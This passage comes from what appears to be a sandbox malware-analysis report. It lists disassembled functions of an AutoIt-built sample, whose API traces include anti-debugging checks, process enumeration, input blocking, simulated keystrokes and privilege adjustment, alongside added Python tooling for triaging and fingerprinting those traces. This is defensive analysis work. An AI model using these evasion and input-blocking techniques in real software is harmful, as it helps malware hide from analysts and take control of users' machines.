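    return [tag for tag, need, forbid in RULES if need <= seen and not (forbid & seen)]


def triage(text: str) -> List[Tuple[str, List[str], List[str]]]:
    """(address of first direct call, direct APIs, tags) for every block in the text."""
    out = []
    for b in parse_blocks(text):
        ref = f"{b['first_ref']:08X}" if b["first_ref"] is not None else "?"
        out.append((ref, b["apis"], tag_block(b)))
    return out


# Constructed input: three blocks copied from the report section above (indentation removed).
SAMPLE = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0065A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 0065A6BA
  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
• Process32NextW.KERNEL32(00000000,?), ref: 0065A79C
• CloseHandle.KERNEL32(00000000), ref: 0065A7AB
  • Part of subcall function 005ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00613303,?), ref: 005ECE8A
Memory Dump Source
• Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
APIs
• IsDebuggerPresent.KERNEL32 ref: 0060271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00602724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00602731
Memory Dump Source
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0063168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006316A1
• FreeSid.ADVAPI32(?), ref: 006316B1
Memory Dump Source
"""

if __name__ == "__main__":
    for ref, apis, tags in triage(SAMPLE):
        print(ref, ", ".join(apis), "->", tags or ["untagged"])
```

Run it over the full report text instead of SAMPLE to get one line per function; blocks that come back untagged are the ones worth opening in the disassembler, and the "first_ref" address lets you jump straight to them.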
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0062D28C
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID: X64
                                                                                • API String ID: 2645101109-893830106
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Variable is not of type 'Object'.$p#j
                                                                                • API String ID: 0-4239671147
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00646918
                                                                                • FindClose.KERNEL32(00000000), ref: 00646961
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00654891,?,?,00000035,?), ref: 006437E4
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00654891,?,?,00000035,?), ref: 006437F4
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0063B25D
                                                                                • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 0063B270
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006311FC), ref: 006310D4
                                                                                • CloseHandle.KERNEL32(?,?,006311FC), ref: 006310E9
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00606766,?,?,00000008,?,?,0060FEFE,00000000), ref: 00606998
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID: 0-3916222277
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 0064EABD
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005F03EE), ref: 005F09DA
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction ID: 54f7bf1038b08fdd843f2552fbf850acbbce60e2de636bffcc7580b29332c827
                                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                • Instruction Fuzzy Hash: 9351697160C60E5BDB3849688A5D7BE2FD5BB5E380F180D09DB82D7282C65DDE02D356
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0&j
                                                                                • API String ID: 0-3046324192
                                                                                • Opcode ID: 51d58fb6f4e0881ade1294c11760271812e772bfbf3461a3264e8f16e73e23f0
                                                                                • Instruction ID: b6105c1a70f90f2cffb5c1e1111e5df04daa01b0726f8209555f404634cd9852
                                                                                • Opcode Fuzzy Hash: 51d58fb6f4e0881ade1294c11760271812e772bfbf3461a3264e8f16e73e23f0
                                                                                • Instruction Fuzzy Hash: 8E21EB322615128BD728CF79C82367E73E6B755310F24862EE4A7C37D0DE35A904CB40
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d8610d82c99d2137bfbb0356a1a031c5647af10c8006e8e9e4938d6939a1e00
                                                                                • Instruction ID: 8cc027099975a87351a6d1be30d45ca88d76d9f005288b39042983cdb9aacea9
                                                                                • Opcode Fuzzy Hash: 6d8610d82c99d2137bfbb0356a1a031c5647af10c8006e8e9e4938d6939a1e00
                                                                                • Instruction Fuzzy Hash: EB321421D69F014DD72B9634DC32336A28AAFB73C5F15D737E81AB5AA5EB29D4C34100
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 72a2e80cfbce78458ca15bfd8e9ea36858db00cfbb02041947117ec32c154eec
                                                                                • Instruction ID: e0aa97e4acc5c7f6c9a99b586ea47b7e22e3c49dd4dcc9de57509e4a432cd610
                                                                                • Opcode Fuzzy Hash: 72a2e80cfbce78458ca15bfd8e9ea36858db00cfbb02041947117ec32c154eec
                                                                                • Instruction Fuzzy Hash: E832E531A009A58ACF28CB29E494ABD7FA3FF45320F288566E49D97791D234DD82DF41
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8d6a7293b1342acc78c57c6d30411e21f01ffb91486c8bfb9ab402cd76723f06
                                                                                • Instruction ID: 710a80eafa37ee04f2547c7ccffefc40310b0c3a8b874507ab416b1737713ab9
                                                                                • Opcode Fuzzy Hash: 8d6a7293b1342acc78c57c6d30411e21f01ffb91486c8bfb9ab402cd76723f06
                                                                                • Instruction Fuzzy Hash: 3C228070A0060ADFDF14CF68D845AEEFBB6FF88300F14452AE816A7391EB35A951CB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 623dae9028782276b364c30e39b92b5020ebc3387e4249d4e6c05e3ec0844786
                                                                                • Instruction ID: 9747e1c9d7bda27390bb6300f40dbb9ca481fd92583b308e034a2245c87a1469
                                                                                • Opcode Fuzzy Hash: 623dae9028782276b364c30e39b92b5020ebc3387e4249d4e6c05e3ec0844786
                                                                                • Instruction Fuzzy Hash: 2702D8B0E00206EBDB14DF54D945AEDBBB6FF44300F148566E8169B391EB31EE51CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction ID: 21cf7690d62cad0de4207c3919d9bab61739a63f4dc0e641bc9c9b3172308d8d
                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                • Instruction Fuzzy Hash: 179188721084A78ADB29463E857403EFFF17A923A131A079DD5F2CB1C5FE18C958D724
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction ID: dca3b08cabe3b01ab3f0cfa2c437268f3f928d391c4447abea178361777c3da2
                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                • Instruction Fuzzy Hash: 1A9175722098E7CADB2D427A857403EFFE16A923A231A079ED5F2CB1C1FD18C554D764
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 369e6e5906e5ce1d2e51b97e7247195e2406800f48341ec2fa4970a52317a1a2
                                                                                • Instruction ID: 2450e25cd9aa24393c400a21348b6295668fd7f63677cb281ddac81174053747
                                                                                • Opcode Fuzzy Hash: 369e6e5906e5ce1d2e51b97e7247195e2406800f48341ec2fa4970a52317a1a2
                                                                                • Instruction Fuzzy Hash: C3616B31208B0E96EE34592C8D99BBE2F95FF8E700F140D1AEB82DB281E55D9E42C315
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction ID: d9b8ea5837d42aba4a7aa51f8825aa9371c9e360fff8024c84be7b4f98b3baba
                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                • Instruction Fuzzy Hash: 458197326094E789DB2D423A863403EFFE17A923A131A079DD5F6CB1C1EE28D554E764
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 00652B30
                                                                                • DeleteObject.GDI32(00000000), ref: 00652B43
                                                                                • DestroyWindow.USER32 ref: 00652B52
                                                                                • GetDesktopWindow.USER32 ref: 00652B6D
                                                                                • GetWindowRect.USER32(00000000), ref: 00652B74
                                                                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00652CA3
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00652CB1
                                                                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652CF8
                                                                                • GetClientRect.USER32(00000000,?), ref: 00652D04
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00652D40
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D62
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D75
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D80
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00652D89
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D98
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00652DA1
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DA8
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00652DB3
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DC5
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0066FC38,00000000), ref: 00652DDB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00652DEB
                                                                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00652E11
                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00652E30
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652E52
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065303F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: ed0333a1fcfbf10a53bc5d550a2a22369bb2ef59f6ceca794d4489b56e2b3574
                                                                                • Instruction ID: 19246a39b63f456e29b1fe2bd67873f75fa6f8b646b74b189374d2f95170b24f
                                                                                • Opcode Fuzzy Hash: ed0333a1fcfbf10a53bc5d550a2a22369bb2ef59f6ceca794d4489b56e2b3574
                                                                                • Instruction Fuzzy Hash: 42029D71500206EFDB14DF64DC99EAE7BBAFB4A321F008159F915AB2A1D770AD01CF60
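The entry above pairs a raw API trace with a condensed "API ID" (Window$Global$CreateRect$...) that analysts use to pivot between reports for functions built from the same imports. The Python below is an added example and not Joe Sandbox code: it parses trace lines in the format shown on this page, rebuilds the API ID with a grouping rule that is inferred from the entries here and is an assumption rather than documented behaviour (CamelCase words shorter than four characters such as Get, Set, Ex, W, Ole and Pos are dropped, the rest are bucketed by how often they occur, each bucket is concatenated alphabetically and buckets are joined with "$"), and checks the trace for an ordered call chain. The numeric API String ID hash is not reproduced because the page does not show how it is computed. The ApiCall record, the function names and the IMAGE_FROM_FILE_CHAIN tuple are choices made for this example; the sample trace is copied from the function entry at 0x00652B30 above.

```python
"""Rebuild a Joe Sandbox-style "API ID" from the API trace lines of one function entry.

Added example, not Joe Sandbox code. The grouping rule (drop CamelCase words under
four characters, bucket by frequency, alphabetical inside a bucket, "$" between
buckets) is inferred from this report's entries and is an assumption.
"""
import re
from collections import Counter
from typing import Iterable, List, NamedTuple, Optional, Sequence, Tuple

# Constructed sample: the API lines of the function entry at 0x00652B30 on this page.
SAMPLE_TRACE = """\
• DeleteObject.GDI32(00000000), ref: 00652B30
• DeleteObject.GDI32(00000000), ref: 00652B43
• DestroyWindow.USER32 ref: 00652B52
• GetDesktopWindow.USER32 ref: 00652B6D
• GetWindowRect.USER32(00000000), ref: 00652B74
• SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00652CA3
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00652CB1
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652CF8
• GetClientRect.USER32(00000000,?), ref: 00652D04
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00652D40
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D62
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D75
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D80
• GlobalLock.KERNEL32(00000000), ref: 00652D89
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652D98
• GlobalUnlock.KERNEL32(00000000), ref: 00652DA1
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DA8
• GlobalFree.KERNEL32(00000000), ref: 00652DB3
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652DC5
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0066FC38,00000000), ref: 00652DDB
• GlobalFree.KERNEL32(00000000), ref: 00652DEB
• CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00652E11
• SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00652E30
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00652E52
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065303F
"""

CALL_RE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"   # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                            # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"                 # ref: call-site address
)
SUBCALL_RE = re.compile(r"Part of subcall function\s+(?P<func>[0-9A-Fa-f]+):")


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when the line is "Part of subcall function"


def parse_trace(text: str, include_subcalls: bool = False) -> List[ApiCall]:
    """Parse report-style trace lines; sub-function lines are skipped unless requested."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        sub = SUBCALL_RE.search(line)
        if sub and not include_subcalls:
            continue
        raw_args = m.group("args")
        args = tuple(a.strip() for a in raw_args.split(",")) if raw_args is not None else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), sub.group("func") if sub else None))
    return calls


WORD_RE = re.compile(r"[A-Z][a-z]*")
MIN_WORD_LEN = 4   # assumption: only words of at least four characters contribute to the ID


def significant_words(api_name: str) -> List[str]:
    """CamelCase words of an API name that survive the length filter."""
    return [w for w in WORD_RE.findall(api_name) if len(w) >= MIN_WORD_LEN]


def api_id(api_names: Iterable[str]) -> str:
    """Frequency-bucketed word summary such as 'Window$Global$CreateRect$...'; '' for no APIs."""
    counts = Counter(w for name in api_names for w in significant_words(name))
    buckets = sorted(set(counts.values()), reverse=True)
    return "$".join("".join(sorted(w for w, n in counts.items() if n == size)) for size in buckets)


# Ordered chain worth flagging: a file is read into an HGLOBAL and handed to OleLoadPicture,
# i.e. image data comes from disk rather than from the PE's own resources.
IMAGE_FROM_FILE_CHAIN = ("CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture")


def has_call_chain(calls: Sequence[ApiCall], chain: Sequence[str]) -> bool:
    """True when every API in `chain` occurs in `calls` in that order (gaps allowed)."""
    remaining = iter(c.api for c in calls)
    return all(name in remaining for name in chain)


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    print(f"{len(trace)} calls parsed")
    print("API ID:", api_id(c.api for c in trace))
    print("file-to-OleLoadPicture chain:", has_call_chain(trace, IMAGE_FROM_FILE_CHAIN))
```

Run against the trace above, api_id returns exactly the API ID printed in the entry, and the single-call case SetUnhandledExceptionFilter yields ExceptionFilterUnhandled as in the first entry of this section, which is what makes the four-character rule plausible; an entry with no API calls yields the empty API ID seen in the entries between them. Treat the reconstruction as a heuristic for pivoting across reports, not as Joe Sandbox's published algorithm.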
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0066712F
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00667160
                                                                                • GetSysColor.USER32(0000000F), ref: 0066716C
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00667186
                                                                                • SelectObject.GDI32(?,?), ref: 00667195
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 006671C0
                                                                                • GetSysColor.USER32(00000010), ref: 006671C8
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 006671CF
                                                                                • FrameRect.USER32(?,?,00000000), ref: 006671DE
                                                                                • DeleteObject.GDI32(00000000), ref: 006671E5
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00667230
                                                                                • FillRect.USER32(?,?,?), ref: 00667262
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00667284
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(00000012), ref: 00667421
                                                                                  • Part of subcall function 006673E8: SetTextColor.GDI32(?,?), ref: 00667425
                                                                                  • Part of subcall function 006673E8: GetSysColorBrush.USER32(0000000F), ref: 0066743B
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(0000000F), ref: 00667446
                                                                                  • Part of subcall function 006673E8: GetSysColor.USER32(00000011), ref: 00667463
                                                                                  • Part of subcall function 006673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00667471
                                                                                  • Part of subcall function 006673E8: SelectObject.GDI32(?,00000000), ref: 00667482
                                                                                  • Part of subcall function 006673E8: SetBkColor.GDI32(?,00000000), ref: 0066748B
                                                                                  • Part of subcall function 006673E8: SelectObject.GDI32(?,?), ref: 00667498
                                                                                  • Part of subcall function 006673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006674B7
                                                                                  • Part of subcall function 006673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006674CE
